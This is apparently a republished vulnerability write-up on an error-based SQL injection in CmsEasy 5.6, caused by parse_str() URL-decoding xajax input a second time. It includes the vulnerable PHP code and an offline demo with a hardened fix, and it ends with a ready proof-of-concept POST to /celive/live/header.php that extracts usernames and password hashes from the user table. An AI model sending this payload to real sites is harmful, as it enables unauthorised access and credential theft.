cmseasy CmsEasy_5.6_20151009 unrestricted error-based injection (the parse_str() pitfall)
阿新 • Published: 2020-08-16
Source: http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137013.html
Injection triggered by parse_str().
// parse_str() parses a query string and registers its contents as variables; when the second argument $arr is given, the result is stored in that array instead. parse_str() urldecodes its input before parsing, so the data is URL-decoded a second time, and that second decode lets a single quote escape the quoting.
The vulnerability is fairly old by now. One restriction is that the PHP version must be below 5.4, because from 5.4 on gpc (magic_quotes_gpc) is disabled by default, and when gpc is off the code calls addslashes().
```php
function Postdata($a) {
    global $db;
    $chatid = $_SESSION['chatid'];
    $name = $_SESSION['name'];
    $a['detail'] = htmlspecialchars($a['detail']);
    // addslashes() runs only when magic_quotes_gpc is off
    if (!get_magic_quotes_gpc()) {
        $a['detail'] = addslashes($a['detail']);
    }
}
```
```php
// Fragment of the xajax request parser (method body excerpt as shown on the page)
if ($rootTag == "xjxquery") {
    $sQuery = "";
    $this->iPos++;
    // Collect the raw query string between <q> ... </q> inside <xjxquery>
    while (!stristr($this->aObjArray[$this->iPos], "</xjxquery>")) {
        if (stristr($this->aObjArray[$this->iPos], "<q>") || stristr($this->aObjArray[$this->iPos], "</q>")) {
            $this->iPos++;
            continue;
        }
        $sQuery .= $this->aObjArray[$this->iPos];
        $this->iPos++;
    }
    // parse_str() urldecodes $sQuery again before splitting it into $aArray
    parse_str($sQuery, $aArray);
    if ($this->bDecodeUTF8Input) {
        foreach ($aArray as $key => $value) {
            $aArray[$key] = $this->_decodeUTF8Data($value);
        }
    }
    // With magic_quotes_gpc on, the slashes PHP added are removed here
    if (get_magic_quotes_gpc() == 1) {
        $newArray = array();
        foreach ($aArray as $sKey => $sValue) {
            if (is_string($sValue))
                $newArray[$sKey] = stripslashes($sValue);
            else
                $newArray[$sKey] = $sValue;
        }
        $aArray = $newArray;
    }
}
return $aArray;
}
```
The vulnerability lies in parse_str($sQuery, $aArray): the value that reaches Postdata() has already been URL-decoded twice, so a quote sent as %2527 passes the magic-quotes handling untouched and is not escaped again.
Error-based injection is therefore possible.
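The three stages described above (PHP's own decode plus magic quotes, xajax's parse_str(), then Postdata()), modelled as an added example that is not CmsEasy or xajax code and runs on a current PHP CLI; the function names and the input are constructed for this illustration.

```php
<?php
// Added example (not CmsEasy or xajax code): models the three stages the page
// walks through so the double decode can be checked offline on a current PHP CLI.

function gpcStage(string $body, bool $magicQuotes): string {
    // Stage 1: PHP fills $_POST (one urldecode); with magic_quotes_gpc on it
    // also applies addslashes(). %2527 only becomes %27 here, so nothing to escape.
    $value = urldecode($body);
    return $magicQuotes ? addslashes($value) : $value;
}

function xajaxStage(string $sQuery, bool $magicQuotes): array {
    // Stage 2: the xajax parser calls parse_str(), which urldecodes a second
    // time (%27 -> '), then strips the slashes magic quotes added.
    parse_str($sQuery, $aArray);
    if ($magicQuotes) {
        foreach ($aArray as $k => $v) {
            if (is_string($v)) {
                $aArray[$k] = stripslashes($v);
            }
        }
    }
    return $aArray;
}

function postdataStage(array $a, bool $magicQuotes): string {
    // Stage 3: Postdata() escapes only when magic quotes are off. ENT_COMPAT
    // reproduces the pre-8.1 htmlspecialchars() default that leaves ' alone.
    $detail = htmlspecialchars($a['detail'] ?? '', ENT_COMPAT);
    return $magicQuotes ? $detail : addslashes($detail);
}

function legacyValue(string $body, bool $magicQuotes): string {
    $a = xajaxStage(gpcStage($body, $magicQuotes), $magicQuotes);
    return postdataStage($a, $magicQuotes);
}

// Hardened order: escape at the SQL boundary, after the last decode, regardless
// of magic quotes. A prepared statement (PDO/mysqli) is the proper fix.
function hardenedValue(string $body, bool $magicQuotes): string {
    $a = xajaxStage(gpcStage($body, $magicQuotes), $magicQuotes);
    return addslashes(htmlspecialchars($a['detail'] ?? '', ENT_COMPAT));
}

$body = 'detail=abc%2527def'; // constructed input: %2527 -> %27 -> '
foreach ([true, false] as $gpc) {
    printf("magic_quotes=%-3s legacy=%-9s hardened=%s\n",
        $gpc ? 'on' : 'off', legacyValue($body, $gpc), hardenedValue($body, $gpc));
}
```

With magic quotes on, the legacy path hands the SQL layer abc'def with the quote unescaped, which is the condition the page names; the hardened order yields abc\'def in both configurations.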
URL: /celive/live/header.php
POST body:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>